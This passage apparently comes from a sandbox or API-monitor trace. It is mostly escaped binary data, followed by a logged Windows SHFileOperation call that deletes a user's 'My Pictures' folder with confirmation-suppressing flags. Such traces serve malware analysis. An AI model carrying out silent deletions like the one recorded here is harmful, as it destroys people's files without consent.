3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd